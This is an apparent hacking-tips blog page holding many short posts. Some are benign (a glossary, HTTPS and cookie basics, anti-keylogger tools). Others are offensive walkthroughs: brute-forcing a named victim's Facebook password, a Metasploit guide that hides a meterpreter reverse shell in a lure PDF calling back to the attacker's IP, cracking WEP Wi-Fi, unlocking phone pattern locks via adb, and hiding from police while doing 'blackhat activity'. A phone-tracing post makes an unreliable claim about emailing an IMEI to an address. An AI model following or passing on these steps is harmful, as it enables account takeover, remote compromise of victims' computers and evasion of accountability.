Facebook Twitter RSS

Lets Discuss About Black Hat, White Hat & Gray Hat Hackers



🔰BLACK HAT HACKERS🔰

Like all hackers, black hat hackers usually have extensive knowledge about breaking into computer networks and bypassing security protocols. They are also responsible for writing malware, which is a method used to gain access to these systems.

Their primary motivation is usually for personal or financial gain, but they can also be involved in cyber espionage, protest or perhaps are just addicted to the thrill of cybercrime. Black hat hackers can range from amateurs getting their feet wet by spreading malware, to experienced hackers that aim to steal data, specifically financial information, personal information and login credentials. Not only do black hat hackers seek to steal data, they also seek to modify or destroy data as well.



📌WHITE HAT HACKERS📌

A white hat hacker is a computer security specialist who breaks into protected systems and networks to test and asses their security.White hat hackers use their skills to improve security by exposing vulnerabilities before malicious hackers (known as black hat hackers) can detect and exploit them.

📌GREY HAT HACKERS📌

The term "grey hat", alternatively spelled as "greyhat" or "gray hat", refers to a computer hacker or computer security expert who may sometimes violate laws or typical ethical standards, but does not have the malicious intent typical of a black hat hacker.

SHARE THIS POST

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author:SilentKiller

Hack Facebook Account Password Using Brute Force




1️⃣. First lets know something about Brute force attacks, “A brute force attack is a trial-and-error method used to obtain information such as a user password or personal identification number (PIN).



2️⃣. In a brute force attack, automated software is used to generate a large number of consecutive guesses as to the value of the desired data.”


But, In our case I’ll be using a Python script and a Long Dictionary Of passwords.


‼️Requirement‼️

A Kali Machine / Or Any Python Engine Will work!
Facebook.py ( v1 or v2 )
A FaceBook id
CrackStation Word List! Which I'll upload shortly.

📌STEPS

📍Step 1. Install Python-mechanize using command mention below
~#apt-get install python-mechanize


📍Step 2. Add facebook.py using the command below
~# chmod +x facebook.py [*]
~# python facebook.py


📍Step 3. Now enter |Email| or |Phone number| or |Profile ID number| or |Username| of the victim,                                                           


📍Step 4. Now Give The "Path" Of Your CrackStation Word list


📍Step 5. Now it will try all passwords present in the word list, So relax as it will take time depending on speed of your processor and password strength of your victim!


SHARE THIS POST

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author:SilentKiller

List of terms used in the field of hacking



🚩Adware − Adware is software designed to force pre-chosen ads to display on your system.

🚩Attack − An attack is an action that is done on a system to get its access and extract sensitive data.

🚩Back door − A back door, or trap door, is a hidden entry to a computing device or software that bypasses security measures, such as logins and password protections.

🚩Bot − A bot is a program that automates an action so that it can be done repeatedly at a much higher rate for a more sustained period than a human operator could do it. For example, sending HTTP, FTP or Telnet at a higher rate or calling script to create objects at a higher rate.

🚩Botnet − A botnet, also known as zombie army, is a group of computers controlled without their owners’ knowledge. Botnets are used to send spam or make denial of service attacks.

🚩Brute force attack − A brute force attack is an automated and the simplest kind of method to gain access to a system or website. It tries different combination of usernames and passwords, over and over again, until it gets in.

🚩Buffer Overflow − Buffer Overflow is a flaw that occurs when more data is written to a block of memory, or buffer, than the buffer is allocated to hold.



🚩Clone phishing − Clone phishing is the modification of an existing, legitimate email with a false link to trick the recipient into providing personal information.

🚩Cracker − A cracker is one who modifies the software to access the features which are considered undesirable by the person cracking the software, especially copy protection features.

🚩Denial of service attack (DoS) − A denial of service (DoS) attack is a malicious attempt to make a server or a network resource unavailable to users, usually by temporarily interrupting or suspending the services of a host connected to the Internet.

🚩DDoS − Distributed denial of service attack.

🚩Exploit Kit − An exploit kit is software system designed to run on web servers, with the purpose of identifying software vulnerabilities in client machines communicating with it and exploiting discovered vulnerabilities to upload and execute malicious code on the client.

🚩Exploit − Exploit is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or vulnerability to compromise the security of a computer or network system.

🚩Firewall − A firewall is a filter designed to keep unwanted intruders outside a computer system or network while allowing safe communication between systems and users on the inside of the firewall.

🚩Keystroke logging − Keystroke logging is the process of tracking the keys which are pressed on a computer (and which touchscreen points are used). It is simply the map of a computer/human interface. It is used by gray and black hat hackers to record login IDs and passwords. Keyloggers are usually secreted onto a device using a Trojan delivered by a phishing email.

🚩Logic bomb − A virus secreted into a system that triggers a malicious action when certain conditions are met. The most common version is the time bomb.

🚩Malware − Malware is an umbrella term used to refer to a variety of forms of hostile or intrusive software, including computer viruses, worms, Trojan horses, ransomware, spyware, adware, scareware, and other malicious programs.

🚩Master Program − A master program is the program a black hat hacker uses to remotely transmit commands to infected zombie drones, normally to carry out Denial of Service attacks or spam attacks.

🚩Phishing − Phishing is an e-mail fraud method in which the perpetrator sends out legitimate-looking emails, in an attempt to gather personal and financial information from recipients.

🚩Phreaker − Phreakers are considered the original computer hackers and they are those who break into the telephone network illegally, typically to make free longdistance phone calls or to tap phone lines.

Share and support us 👇
🆔 @thebughacker

❌ Don't forget to give us credits ❌

SHARE THIS POST

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author:SilentKiller

How to Embed a backdoor in a PDF file



Step 1)Run Metasploit

Step2) Find the Appropriate Exploit.

I will search metasploits database for an exploit for adobe pdf on windows, using this command:

●Code:msf > search type:exploit platform:windows adobe pdf

You should see the exploit "exploit/windows/fileformat/adobe_pdf_embedded_exe", which we will use:

●Code:msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe



Step 3) Set the Payload

I will use the meterpreter payload again, because it is one of the most powerful payloads available to us:

●Code:msf > exploit (adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp

Step 4) Set the exploit options

First, display the required options for the exploit:

●Code:msf > exploit (adobe_pdf_embedded_exe) > show options

You can see that we must provide an existing PDF file to the INFILENAME option in which to embed the meterpreter payload. I will call it "hemantexample.pdf":

●Code: msf > exploit (adobe_pdf_embedded_exe) > set INFILENAME example.pdf

The next option is the output file name, FILENAME. Change this to something innocent that will attract users to open it:
msf > exploit (adobe_pdf_embedded_exe) > set FILENAME recipes.pdf

Finally, we need to specify the LHOST, which is our (the attackers) IP address. Mine is 192.168.1.8:

●Code:msf > exploit (adobe_pdf_embedded_exe) > set LHOST 192.168.1.8

Step5) Run the Exploit.

Now that all the options are set, we can run the exploit like this:

●Code: msf > exploit (adobe_pdf_embedded_exe) > exploit

Metasploit has created a PDF named recipes.pdf that contains the Meterpeter listener. Now, simply get users to open the pdf (Social Engineering again), and you will get instant control of their computer easy as fucking smile :)


Thanks for reading, please reply with your thanks if you enjoyed this and/or found it useful the please share my effort in other groups and channels .


SHARE THIS POST

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author:SilentKiller

🔰HOW TO TRACE A MISSING OR STOLEN PHONE🔰


◽◽◽◽◽◽◽◽◽◽
If you lose your #mobile phone, you can #trace it without going to the police.
➖➖➖➖➖➖➖➖➖➖
Most of us always fear that our phones may be #stolen at any time.
➖➖➖➖➖➖➖➖➖➖
Each phone carries a unique
#IMEI no. i.e. International Mobile Equipment Identity No which can be used to track it anywhere in the world.



This is how it works:
➖➖➖➖➖➖➖➖➖➖
1. Dial \*#06# from your mobile.
➖➖➖➖➖➖➖➖➖➖
2. Your mobile phone shows a unique 15 digit.
➖➖➖➖➖➖➖➖➖➖
3. Note down this number at a secure place except in your mobile phone itself as this is the #number which will help trace your phone in case of theft.
➖➖➖➖➖➖➖➖➖➖
4. Once stolen, just E-mail this 15 digit IMEI No. to cop@vsnl.net with details as stated below:

Your name:
Address:
Phone model:\_
Make:\_
Last used No.:\_
E-mail for communication:\_
Missed date:\_
IMEI No :\_
➖➖➖➖➖➖➖➖➖➖
5.Your Mobile will be #traced within next 24 hours via a complex system of GPRS and internet, You will find where your hand set is being operated and the new user's No. will be sent to your #email.
➖➖➖➖➖➖➖➖➖➖
6. After this, you can inform the Police with the details you got

SHARE THIS POST

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author:SilentKiller

How to recover deleted image or video from android (internal storage) without root




▪️STEP 1: DOWNLOAD AND INSTALL JIHOSOFT
ANDROID PHONE RECOVERY AT YOUR COMPUTER.



👉You could download the Windows version at:
Android Recovery , download Mac version at:
Android Recovery for Mac . After download, you will
be lead to install the app at your computer.

▪️STEP 2: SELECT DATA GENRE THAT YOU NEED TOSCANAfter installation, run the app at your PC. You willsee the interface show you four options:

👉“Mul”, “Database”, “WhatsApp”, “All”. Tap
One of it according to your own demand.

▪️STEP 3: IDENTIFY ANDROID PHONE OR TABLET BY COMPUTER.

👉First, connect your android device to computer via USB cable. Then, turn on USB debugging at android
equipment.If the app failed to identify your equipment, install related USB driver at your computer.

▪️STEP 4: SCAN ANDROID DEVICE AND EXPECT THE RESULT

👉After identification, click "Start" for scanning.

Please be patient about the process.

▪️STEP 5: PREVIEW DATA THAT LISTED ON THE
RESULT.

👉You will be able to review all the details of desired
data.

▪️STEP 6: RECOVER DATA FROM ANDROID WITHOUT
ROOT.

👉Mark those data that you want, then tap “Recover”to fulfill android data recovery without root.


SHARE THIS POST

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author:SilentKiller

What is the difference between http and https?



Some of you may be aware of this difference, but it is
worth sharing for many that are not.



The main difference between http:// and https:// is all about keeping you secure.

HTTP stands  for Hyper Text Transfer Protocol.
The S (big  surprise)  stands for "Secure". If you visit a Website or web page, and look at the address in the web browser, it is likely begin with the following: http:///.

This means that the website is talking to your browser using
the regular unsecured language. In other words, it is possible for someone to  "eavesdrop" on your computer's conversation with  the Website. If you fill out a form on the website, someone might see the information you send to that site.
   
This is why you never ever enter your credit card number in an
Http website! But if the web address begins with https://, that means your computer is talking to the website in  a
Secure code that no one can eavesdrop on.

Now, you understand why this is so important, right?
   
If a website ever asks you to enter your Credit/Debit card
Information, you should automatically look to see if the web
address begins with https://.
   
If  it doesn't, you should NEVER enter sensitive Information such as a credit/debit card number.
   
PLS PASS IT ON (You may save someone a lot of grief).


While checking the name of any website, first look for the domain extension (.com or .org, .co.in, .net  etc). The name just before this is the domain name of the website. Eg, in the above example, http://amazon.diwali-festivals.com, the word before .com is "diwali-festivals" (and NOT "amazon"). So, this webpage does not belong to amazon.com but belongs to "diwali-festivals.com", which we all haven't heard of before.
You can similarly check for bank frauds.
Before your ebanking logins, make sure that the name just before ".com" is the name of your bank. "Something.icicibank.com" belongs to icici; but, icicibank.some1else.com belongs to "some1els.

You've hopefully learned something new, now please share and educate others.


SHARE THIS POST

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author:SilentKiller

What Are Cookies? What is a Cookie⁉️



Cookies are small files which are stored on a user's computer. They are designed to hold a modest amount of data specific to a particular client and website, and can be accessed either by the web server or the client computer. This allows the server to deliver a page tailored to a particular user, or the page itself can contain some script which is aware of the data in the cookie and so is able to carry information from one visit to the website (or related site) to the next.



Are Cookies Enabled in my Browser⁉️

To check whether your browser is configured to allow cookies, visit the Cookie checker. This page will attempt to create a cookie and report on whether or not it succeeded.

For information on how to enable or disable cookies, see 'Enabling cookies'.

For information on how to delete and clear cookies, see 'Deleting cookies'.

What's in a Cookie⁉️

Each cookie is effectively a small lookup table containing pairs of (key, data) values - for example (firstname, John) (lastname, Smith). Once the cookie has been read by the code on the server or client computer, the data can be retrieved and used to customise the web page appropriately.

SHARE THIS POST

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author:SilentKiller

♻️HOW TO BYPASS GMAIL MOBILE VERIFICATION TUTORIAL♻️





STEP-1

♻️Go to K7.net Sign up there.


STEP-2

♻️Create an account on gmail, but in location fill United States.


STEP-3

♻️After Creating your e-mail account,Now it will take you to mobile verification page.

STEP-4

♻️Here select the option of Voice call and fill the no: that you got from the website (k7.net)



STEP-5

♻️Now you will get a mail having verification code as voice mail on that account from which you have registered on.

STEP-6

♻️Go open it,
download
the attachment file and listen the code after that type the code of your voice mail in verification code and click
OK

✅Done. Your account is ready now.


SHARE THIS POST

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author:SilentKiller

How To Be 100% Anonymous In 2020




Hello haxchip Members! In this thread i will be talking about ways to be anonymous from my knowledge!
This thread will help a lot of you noobs!
You can put all these ways together at once and you will be like 98% anonymous while hacking and doing blackhat activity...
This whole guide is written by me. every piece of it is from my knowledge. i can guarentee i'm 100% right  Yeye

1. VPN that DOES NOT keep any logs!
I think MullVad VPN is best as it doesn't keep logs and its very cheap and fast!
Can't beat that...
A VPN will make sure your secure while hacking online.
It hides your IP address and makes sure you can't be tracked.
But a VPN isn't the ONLY thing you should use while blackhat hacking or trying to protect yourself.
You should use other tools too to remain 99.9%!
I recommend only buying a VPN with Bitcoin so the payment cant be traced.



2. Proxychains on a linux system like kali linux or Tails
You should use proxychains to stay anonymous with everything else added too.
you can get proxys by scraping or grabbing them.
I highly recommend buying like a list of 25 "PRIVATE" socks5 proxy servers.
Private ones don't keep logs but if you get free ones that do keep logs then only connect to the proxy if you have your VPN on that doesn't have logs.
I recommend making your own proxy grabber that will only grab elite proxies that are mostly all alive.
If you can't code your own then you should use netghost to get proxies. It runs on windows but you can always upload it to a file sharing site and get it on your own linux system. The proxy chains location on kali linux is /etc/proxychains.conf [Command is "leafpad /etc/proxychains.conf". Add proxies there :).

3. Tails to keep anonymous
You can use all the anonymous tips above on a Tails system also.
Make sure to run tails off a live USB or DVD. It will ensure more anonimitity.
You can use tor with tails too so it will make you more hidden.
Not much to say with tails.

4. Virtual Machines
You can stack virtual machines on top each other with tails. Then use everything else to hide.
Once you do something really illegal then delete all data and be gone.
You can also use CCleaner to clean all logs on system.
Even delete VM iso file and re download on a different IP.

5. Coffee Shops And Such
You can use a raspberry PI connected to a Public wifi.
Make sure to stay off property and go like across the street while connected.
Use all the stuff above while at the open wifi.
You will remain anonymous!

6. CCleaner
You can use CCleaner too delete all system logs and just all types of data
It will clean everything out your PC then after you use CCleaner make sure to reinstall it again (Not really needed just an extra layer).

7. Browser Windows
If your using chrome or any other browser in the earth then make sure not to maximize your browser window!
While using any browser like Tor, Firefox, Chrome or others make sure to keep it small....
People can track you by your browser window!
Keep safe!

8. MAC Address
Change your mac address so you can't be tracked using tools like macchanger on any linux op.
Your mac address can be used to get a location on your PC.
Make sure to do this too.

9. Webcam
Make sure to tape your webcam so none of our fellow Police man or any other person can see you can get pictures.
Short one XD

SHARE THIS POST

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author:SilentKiller

KICK OUT UNECESSARY USERS FROM YOUR WIFI NETWORK



1.Download & Install Arcai’s NetCut Application from play store.


2. Open the App. Make sure your device is connected to the wifi network. Now you can see all the devices connected to your WiFi network.


3. All device Mac addresses & manufacturer names are also listed with IP address. If you want to kick out a specific device. Then simply tap on small wifi icon available on left side in list. Then move the slider to the left. Done, You kicked out a device from your network.

Adjust the slider according to your need if you want to set low speed for specific android device.


SHARE THIS POST

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author:SilentKiller

How to Stop Websites from Asking for Your Location.


GOOGLE CHROME

1. Go to the settings inside this browser and under the preferences page check for the Show Advanced Settings option.

2. Click on this option and thereafter click on the Content Settings button placed under the Privacy section.

3. Come across the various options and look for the Location settings option or the section.

4. Simply select the “Do Not Allow Any Site to track your Physical Location” option.

That’s all!



MOZILLA FIREFOX

1. Type in the Address field of the Firefox this simple keyword: about: config and then hit enter.

2. This is the shortcut to the about screen of the Mozilla Firefox and from the page, it links you can be able to set the preferences for the location tracking.

3. Accept the prompt that would appear on your screen after you reach the link page.

4. Double click on the “Geo-enabled” option on the page and the Firefox will stop every site to track the location or ask for it!

APPLE SAFARI

Go to the Privacy settings and then set the Websites Use of Location Services to Deny without prompting. That’s all!


SHARE THIS POST

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author:SilentKiller

HOW TO UNLOCK LOCK PATTERN USING COMMAND PROMPT





1⃣ Connect your android phone to you computer.

2⃣ Open Commande prompt administrator.



3⃣ Now in command prompt window type following code carefully [ adb shell cd/data/data/com.android.providers.settings/databases sqlites settings.db ] update system set value=0 where name=’lock_pattern_autolock’; update system set value=0 where name=’lockscreen.lockedoutpermanently’; .quit

4⃣ Now you will see some screen as shown below and then you can reboot your phone and now when your android starts again, then try unlocking it using any random pattern and it will unlock and work pretty fine.

5⃣  If you face any problem repeat same steps but instead of the above code tru using [ adb shell rm/data/system/gesture.key] and the press enter and now reboot your device to see if it works.


SHARE THIS POST

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author:SilentKiller

How To Hack Wi-fi Hunting Down & Cracking WEP Networks

While the security behind WEP networks was broken in 2005, modern tools have made cracking them incredibly simple. In densely populated areas, WEP networks can be found in surprising and important places to this day, and they can be cracked in a matter of minutes. We'll show you how a hacker would do so and explain why they should be careful to avoid hacking into a honeypot.

Often one of the first wireless attacks a hacker will learn, WEP networks in your area can be tracked down with only a few software tools and cracked with a network adapter supporting packet injection. While WEP cracking has always been relatively straightforward, the simplicity with which it can be found and broken in 2018 brings it firmly into the abilities of even the most novice of hackers.

While still much more rare to see than open or WPA-encrypted networks, the evolution of tools like Wigle Wifi allows anyone with an Android phone to identify WEP networks for themselves simply by walking or driving by one. Even easier than doing this in person is to simply look at online wardriving databases which clearly show the location of these networks.

Thanks to years of wardriving data, Wigle.net tracks statistics about the type of encryption used with any detected Wi-Fi networks uses. Over time, the percentage of Wi-Fi networks using WEP has dwindled from 45% to a stubborn 7.45 percen

Why WEP Networks Are So Vulnerable

WEP, or Wired Equivalent Privacy, was implemented in 1995 to provide the same expectation of privacy as on wired networks for users of Wi-Fi but had security problems that came to light shortly after. It was deprecated in 2004, superseded by the WPA and WPA2 encryption that you see today. The reason for this was a series of increasingly devastating attacks against the encryption used in WEP, resulting in the ability to recover the password in a matter of minutes.

WEP is a stream cipher which relies on never using the same key twice to provide security. Unfortunately, as demonstrated in several published attacks, an attacker is easily able to force the same key to be used twice by replaying network traffic in a way that forces a tremendous amount of packets to be generated. This allows an attacker to collect the data needed to determine the encryption key and crack the network password outright. With good range and a powerful network adapter, anyone can expect to crack WEP networks in only a few minutes.

The power behind WEP hacking comes from two different parts of the attack: the ability to stimulate traffic even from a busy network and the ability to crack the network password when collecting a certain amount of that traffic. Remember that with WPA, hackers can't even capture a handshake from an empty network, but even an empty WEP network can be attacked with packet

Where WEP Networks Can Be Found

In an incident in May of 2006, WEP networks left connected to the credit card processing terminals in TJ Maxx stores allowed a hacker to access the credit card data of millions of customers in one of the biggest ever data breachs. This dramatic example underscored the fact that WEP networks are a critical security risk anywhere they are used.

Today, WEP serves two major functions in the hacking world: being an easy target and being a trap for script kiddies. Because WEP hacking is often the first criminal hackers learn too, it's often entertaining to set up a honeypot to catch local script kiddies trying to break in. In spite of the popularity of WEP honeypots, you'll find plenty of legitimate vulnerable networks nearby. In general, everyone should treat these as highly suspicious, since it's unlikely that only one person has tried to break into the network.


​To find nearby WEP networks, one can simply go to Wigle.net and sign up for a free account. Next, they would click "Advanced Search" and run a search for networks with WEP security near their location. In my example below, I chose to limit my search to only networks I'd seen with my phone personally.

In a dense area, one could simply drive around with the Wigle Wifi Android app, upload the files to Wigle, then run this search. This will reveal the location on a map of every WEP network that was passed. The results can be surprising!


Caution for Cracking WEP

As I previously stated, WEP is extremely simple to crack. Just because it's easy doesn't mean it's legal, so make sure that you have permission to do this to any network you're practicing on before launching this kind of attack. While it's very likely the attack will succeed, and it's good to know this skill, the risk that the network you are attacking is a honeypot is much higher than the average encrypted network. WEP is fundamentally broken, so very few people will choose to use it.

Another thing you should consider is that you will very likely not be the first person to crack that WEP network. Depending on the intentions of the person who got there first, the network could be doing anything from stealing credentials to providing a VPN endpoint for very bad stuff. Because you don't know what could be going on, be very cautious about connecting to networks that could be used for nefarious purposes. If WEP is implemented in a business, cracking WEP is often the first line of attack for a pentester to quickly embarrass their client.

What You'll Need to Get Started

To crack a WEP network, you'll need to be able to stimulate enough network traffic to cryptographically attack the key. The best way to do this is to use a wireless network adapter that's capable of packet injection. This means our adapter will be able to send forged packets to our target network, allowing us to replay anything that would cause the router to provide the amount of traffic we need.

We've tested several Panda Wireless network adapters like the PAU06 and PAU09, and found them to work well for packet injection with Kali Linux. We have a list of the best compatible network adapters available for Kali in the article linked below if you need some help selecting one.


You'll also need a fully updated version of Kali Linux, which you can run as a virtual machine or directly on something like a Raspberry Pi.


​Step 1

Locate Nearby WEP Networks

To start attacking a WEP network, you'll need to find one first. To do so, you'll run a series of filters with Airodump-ng to help you locate only vulnerable networks nearby. Airodump-ng is included in the Aircrack-ng package, so be sure to install it with apt-get install aircrack-ng if you don't already.


To get started, type ifconfig to find the name of your wireless network adapter, which you should have plugged in already. In Kali Linux, it should be something like wlan0.

Next, you'll need to put your attack card into monitor mode. In a terminal window, type sudo airmon-ng start wlan0. This will put your card into monitor mode, likely changing the name of the card as well. Take note of this new name by running ifconfig or ip a again, as you'll need it for the next step.

Next, run Airodump-ng with the filter --encrypt WEP to see only WEP networks nearby. The complete command can be seen below.

sudo airodump-ng wlan0mon --encrypt WEP

This will scan the area for any packets using WEP encryption, returning the name and information of the network if one exists. Once you have the information, you'll need to use it as a filter to tailor your attack in the next step.



​Step 2

Attack a Discovered WEP Wi-Fi Network

Once you have the information you need for targeting the WEP network from Airodump-ng, there are a few variables you'll need to remember. First, take note of the channel number, and second, copy the BSSID (or MAC address) of the network.

The next tool you're going to use is a little aggressive, to say the least. Besside-ng will attack all Wi-Fi networks nearby if you don't give it the proper attack parameters to prevent this behavior. The actual attack, however, is highly automated and should proceed until the attack is successful in recovering the WEP network key for as long as you are in the range of the network.



To launch the attack, type the following into a terminal window, swapping out the appropriate information.

besside-ng -c ChannelTargetIsOn -b BSSIDofTargetNetwork NameOfInterfaceCard

​Step 3

Flood the Network & Extract the WEP Key

While the attack proceeds, Besside-ng will log all of the data it collects in a .cap file for later retrieval. If you experience any problems with Besside-ng or get disconnected, don't worry! You can run Aircrack-ng on the .cap file as you add more data generated by Besside-ng, and all of your collected IVs (initialization vectors) will be there. This means you can come back to the same place at different times and gather more IVs to your .cap file until you can crack them to derive the password by running Aircrack-ng.



​To try to crack the WEP network for the information you've gathered, you'll need to call Aircrack-ng with the location of the .cap file as the argument. This is pretty easy since Besside-ng usually stores WEP.cap in the root folder. That means running the command to try cracking the network is usually as seen below.

aircrack-ng ./wep.cap

This will read the .cap file and allow you to select which network you want to crack from the ones Besside-ng has encountered. If you have saved up enough IVs, you can crack the password outright, or you can leave it running while Besside-ng runs, and the attack will be repeated automatically every 5,000 IVs until it

Protecting Yourself Against WEP Attacks

Unless you are trying to catch local script kiddies in the act, there is no reason to use WEP encryption for anything. Aside from being insecure, it also makes your system a very visible target. You should scan for WEP networks in your home and work using Kismet or the Wigle Wifi app, and replace or upgrade any devices that are still using this broken standard of encryption.

WEP Encryption Is the Easiest to Crack

There you have it, it only takes a few minutes to break into a WEP network using modern tools like Airodump-ng and Besside-ng in conjunction with an appropriate wireless network adapter. Since WEP cracking is a staple of Wi-Fi hacking, I wanted to be sure we covered it in our intro to Wi-Fi hacking series. Hopefully, you have an understanding of what WEP is, why it's vulnerable, and how to go about actually cracking it.

SHARE THIS POST

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author:SilentKiller

How to access your WLAN details and change it



1) Download Router Set-up Page from PlayStore.

2) then click on your Router page.

3) They will ask for user and password.



4) You have to enter your router IP no. And search google for username nd password

5) After u login in find something called "Wireless info"

6) It may be in different name sometimes

7) Now u can view your Wi-Fi password or edit it or change username etc.

 ♻This is shared only for educational Purposes♻

SHARE THIS POST

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author:SilentKiller

How to Remove .rar password




First go to Online Zip converter.

Now Browse your password protected rar file.



Now click on convert file.

Now it will first upload this file to its server and then convert into zip format and remove its password.

Now you can download this zip file without password.


SHARE THIS POST

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author:SilentKiller

How To Encrypt Keyboard To Avoid Keyloggers



If we start encrypting keystrokes of a keyboard the value that keylogger will record is different from the actual value, that means they would only record random characters. We will be using Keyscrambler software to encrypt our keyboard. So have a look on simple steps below to implement this in your Windows PC.



Steps To Encrypt Keystrokes To Avoid Keylogger Attacks :-

Step 1. First of all download and install the toolKeyScrambler.



Step 2. Now after downloading, install it and after complete installation, you have to reboot your system.



Step 3. Now when your computer boots up, right click on the icon of KeyScrambler in the system tray at the bottom of a screen.



Step 4. Now choose options from there and Keyscrambler will open and you will see the screen like below.



Step 5. Now you can alter settings in this according to your wish and after that simply click on ok. Now your key scrambler app is ready, open your browser and type anything you can see that your keystrokes are being encrypted.



That’s it! you are done, now you can see this tool every time you open your browser.



Similar Type Of Softwares

Guarded ID



GuardedID eliminates your vulnerability to data theft due to keylogging attacks, a leading cause of cyber crime. StrikeForce’s patented anti-keylogging technology secures your sensitive personal and financial information by proactively encrypting every keystroke as you type. GuardedID also provides advanced anti-clickjacking and anti-screen capture technology, for multiple layers of protection from cyber attacks.

Zemana Antilogger



Zemana AntiLogger recognizes, prevents and blocks any kind of online identity theft and financial deception. Zemana AntiLogger allows you to camouflage your daily online activities-shopping, calling, texting, online banking and more, so intruders can never get a pick into it.

Oxynger KeyShield



Oxynger KeyShield is a secure, anti-screenshot and free virtual keyboard to protect passwords and other sensitive information from malicious programs and hacking. Oxynger KeyShield protects its keystrokes from keystroke logging, screen logging, mouse logging, clipboard logging and shoulder surfing.

NextGen AntiKeylogger



This is the next generation anti-keylogger program that guards your data against all types of keylogging programs both known, unknown or being developed right now. NextGen AntiKeylogger uses some unique method of protection.

Spyshelter



SpyShelter Anti-Keylogger gives trustworthy protection in real time against known and unknown zero-day spy and monitoring software, for example: keyloggers, screen loggers, webcam loggers, and even advanced financial malware.

Elite Anti Keylogger



With Elite Anti Keylogger you can efficiently remove keyloggers, detect spyware, trojans, worms, and other malicious software. This software helps you watch vulnerable areas of your system particularly related to other applications’ monitoring activities and detect even most advanced keyloggers.



So above is all about Encrypt Keyboard To Avoid Keyloggers. With this, you can easily protect yourself from keylogger attacks and disallow attackers to steal your Personal Identification from your computer. Hope you like this cool security tips. Do share with others too!


SHARE THIS POST

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author:SilentKiller

How To Stream Windows 10 Screen On VR Android Device




➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖
✅ The method is quite simple but little bit time consuming and with that you can easily mirror your PC to your VR android. So follow up the steps below to proceed.

🔵 Steps To Stream Windows 10 Screen On VR Android Phone:



1⃣ First of all download and install the trinus VR windows 10 Server on the computer/Laptop.

2⃣ Now download the Trinus VR lite Client App on your Android Phone.

3⃣ Both Server and Client should be connected to the same network i.e. Connect both the computer/Laptop and Android Mobile to the Same Wi-fi Router.

4⃣ After you have installed the Trinus VR server and client app on the respective devices, Start first the Server App on the Computer, Then Launch the Trinus VR Client app on the Android device.

5⃣ Now the Server and client will try to connect to each other based upon the type of connection. Now either select the Method A (WiFi) or the Method B (USB) to get the devices Connected.

6⃣ If you are using the WiFi mode of connection, Please open the Trinus VR App on server(computer) and Client (android device)

7⃣ Now, press the start buttonon Server and wait until it detects the client automatically. If it doesn’t detect the client automatically copy the IP address.

8⃣ Now select the “IP” option on the computer and Enter the IP address of the client.

9⃣ Now click on the “OK” button. the Trinus logo will now be “Blue(Voilet)” instead of the previous grey.

✅ Thats it you are done, now you successfully streamed your normal windows screen to your android phone in VR Format. Simply navigate your mouse to change the screen streamed to your Android Phone.
➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖

SHARE THIS POST

  • Facebook
  • Twitter
  • Myspace
  • Google Buzz
  • Reddit
  • Stumnleupon
  • Delicious
  • Digg
  • Technorati
Author:SilentKiller

How to Find the Exact Location of Any IP Address



Have you ever wondered where the physical location of an IP address is? Maybe you want to know if that proxy server you are using is actually out of your local legal jurisdiction. Or, maybe you have the IP address of someone you are corresponding with and want to make certain they are where they say they are. Or, maybe you are a forensic investigator tracking down a suspect who wrote a threatening email or hacked someone's company.

Now you can find the location of that IP address without a subpoena or search warrant

A company called MaxMind maintains a database of the location of every IP address on the planet complete with GPS coordinates, area code, zip code, and country. This database is not in a typical relational database format, but rather in a flat file. MaxMind charges a $370 site license and $90/month (or $1360/year) for updates to this database. Their software has a beautiful front end that makes querying the database easy enough that even Windows or Mac users can manage.
MaxMind also gives away a free developers version of this database without any software or tools to read it. Although slightly less accurate than the commercial version, the price is certainly right. All we need to find the location of the IP is a program to read this data.
Two programmers, Jennifer Ennis and T. Williams, have developed a small Python script called pygeoip and released it under the GPL license that enables us to input an IP address and output this critical information.

Step 1

Fire Up Kali & Open a Terminal

The first step, of course, is to fire up our our trusty Kalisystem, or in this case, any Linux distribution. Then, open a terminal.
Note: Be cautious of the formatting below for commands. The formatting of this article will create big space gaps since it stretches lines out to fit the margins. This is because of long URLs that try to fit themselves on a separate line. Large spaces equals just one space, so keep that in mind. Refer to the screenshots to see how they actually look.

​Step 2

Download the Database

